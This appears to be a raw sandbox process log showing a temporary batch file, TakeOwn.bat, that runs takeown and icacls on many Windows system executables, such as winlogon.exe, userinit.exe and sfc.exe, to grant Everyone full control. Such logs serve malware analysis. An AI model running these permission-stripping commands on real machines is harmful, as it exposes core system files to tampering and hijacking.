C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\ScreenClippingHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\ScreenClippingHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\ScreenClippingHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\SearchHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\SearchHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\SearchHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\TextInputHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\TextInputHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\TextInputHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\WebExperienceHostApp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\WebExperienceHostApp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\WebExperienceHostApp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\n\MiniSearchHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\n\MiniSearchHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\n\MiniSearchHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userinit_31bf3856ad364e35_10.0.22000.37_none_be275aadedb23f4a\f\userinit.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userinit_31bf3856ad364e35_10.0.22000.37_none_be275aadedb23f4a\f\userinit.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userinit_31bf3856ad364e35_10.0.22000.37_none_be275aadedb23f4a\f\userinit.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-virtualdiskservice_31bf3856ad364e35_10.0.22000.282_none_66112670800af37c\f\vds.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-virtualdiskservice_31bf3856ad364e35_10.0.22000.282_none_66112670800af37c\f\vds.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-virtualdiskservice_31bf3856ad364e35_10.0.22000.282_none_66112670800af37c\f\vds.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-virtualdiskservice_31bf3856ad364e35_10.0.22000.282_none_66112670800af37c\f\vdsldr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-virtualdiskservice_31bf3856ad364e35_10.0.22000.282_none_66112670800af37c\f\vdsldr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-virtualdiskservice_31bf3856ad364e35_10.0.22000.282_none_66112670800af37c\f\vdsldr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-vssservice_31bf3856ad364e35_10.0.22000.469_none_560fc7f19d1d3ed7\f\VSSVC.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-vssservice_31bf3856ad364e35_10.0.22000.469_none_560fc7f19d1d3ed7\f\VSSVC.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-vssservice_31bf3856ad364e35_10.0.22000.469_none_560fc7f19d1d3ed7\f\VSSVC.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..ebviewhost.appxmain_31bf3856ad364e35_10.0.22000.120_none_05dfd9bc9f8bc6b6\f\Win32WebViewHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..ebviewhost.appxmain_31bf3856ad364e35_10.0.22000.120_none_05dfd9bc9f8bc6b6\f\Win32WebViewHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..ebviewhost.appxmain_31bf3856ad364e35_10.0.22000.120_none_05dfd9bc9f8bc6b6\f\Win32WebViewHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_c58bc93032642398\f\WSManHTTPConfig.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_c58bc93032642398\f\WSManHTTPConfig.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_c58bc93032642398\f\WSManHTTPConfig.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_c58bc93032642398\f\wsmprovhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_c58bc93032642398\f\wsmprovhost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_c58bc93032642398\f\wsmprovhost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..wsupdateclient-core_31bf3856ad364e35_10.0.22000.493_none_a9fee4e32efd000a\f\wuauclt.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..wsupdateclient-core_31bf3856ad364e35_10.0.22000.493_none_a9fee4e32efd000a\f\wuauclt.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..wsupdateclient-core_31bf3856ad364e35_10.0.22000.493_none_a9fee4e32efd000a\f\wuauclt.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-waasmedic_31bf3856ad364e35_10.0.22000.132_none_2eb02d05c34e2eef\f\WaaSMedicAgent.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-waasmedic_31bf3856ad364e35_10.0.22000.132_none_2eb02d05c34e2eef\f\WaaSMedicAgent.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-waasmedic_31bf3856ad364e35_10.0.22000.132_none_2eb02d05c34e2eef\f\WaaSMedicAgent.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\f\wifitask.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\f\wifitask.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\f\wifitask.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wimgapi_31bf3856ad364e35_10.0.22000.194_none_841924fc9a413271\f\wimserv.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wimgapi_31bf3856ad364e35_10.0.22000.194_none_841924fc9a413271\f\wimserv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wimgapi_31bf3856ad364e35_10.0.22000.194_none_841924fc9a413271\f\wimserv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winlogon-tools_31bf3856ad364e35_10.0.22000.120_none_8fd8aab412295721\f\wlrmdr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winlogon-tools_31bf3856ad364e35_10.0.22000.120_none_8fd8aab412295721\f\wlrmdr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winlogon-tools_31bf3856ad364e35_10.0.22000.120_none_8fd8aab412295721\f\wlrmdr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winlogon_31bf3856ad364e35_10.0.22000.282_none_6ae954e75a4dd338\f\winlogon.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winlogon_31bf3856ad364e35_10.0.22000.282_none_6ae954e75a4dd338\f\winlogon.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winlogon_31bf3856ad364e35_10.0.22000.282_none_6ae954e75a4dd338\f\winlogon.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\BootRec.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\BootRec.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\BootRec.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\RecEnv.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\RecEnv.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\RecEnv.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\StartRep.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\StartRep.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-winre-tools_31bf3856ad364e35_10.0.22000.65_none_ac11e3d68c043701\f\StartRep.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wrp-integrity-client_31bf3856ad364e35_10.0.22000.120_none_26a3fe1b7073b18d\f\sfc.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wrp-integrity-client_31bf3856ad364e35_10.0.22000.120_none_26a3fe1b7073b18d\f\sfc.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-wrp-integrity-client_31bf3856ad364e35_10.0.22000.120_none_26a3fe1b7073b18d\f\sfc.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_f698302c22284569\f\XGpuEjectDialog.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_f698302c22284569\f\XGpuEjectDialog.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_f698302c22284569\f\XGpuEjectDialog.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-xbox-gamecallableui.appxmain_31bf3856ad364e35_10.0.22000.120_none_1e850fa96c804e78\f\XBox.TCUI.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-xbox-gamecallableui.appxmain_31bf3856ad364e35_10.0.22000.120_none_1e850fa96c804e78\f\XBox.TCUI.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-xbox-gamecallableui.appxmain_31bf3856ad364e35_10.0.22000.120_none_1e850fa96c804e78\f\XBox.TCUI.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_aa4efcf84be1b89b\f\CheckNetIsolation.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_aa4efcf84be1b89b\f\CheckNetIsolation.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_aa4efcf84be1b89b\f\CheckNetIsolation.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros..x-deployment-server_31bf3856ad364e35_10.0.22000.493_none_e73dfe4d18ff7931\f\ApplyTrustOffline.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,6382627284399283174,17416505605261007163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros..x-deployment-server_31bf3856ad364e35_10.0.22000.493_none_e73dfe4d18ff7931\f\ApplyTrustOffline.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros..x-deployment-server_31bf3856ad364e35_10.0.22000.493_none_e73dfe4d18ff7931\f\ApplyTrustOffline.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros..x-deployment-server_31bf3856ad364e35_10.0.22000.493_none_e73dfe4d18ff7931\f\CustomInstallExec.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros..x-deployment-server_31bf3856ad364e35_10.0.22000.493_none_e73dfe4d18ff7931\f\CustomInstallExec.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros..x-deployment-server_31bf3856ad364e35_10.0.22000.493_none_e73dfe4d18ff7931\f\CustomInstallExec.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchFilterHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchFilterHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchFilterHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchIndexer.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchIndexer.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchIndexer.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchProtocolHost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_20c655d14680f9cf\f\SearchProtocolHost.exe"
C:\Windows\SysWOW64\icacls.exe
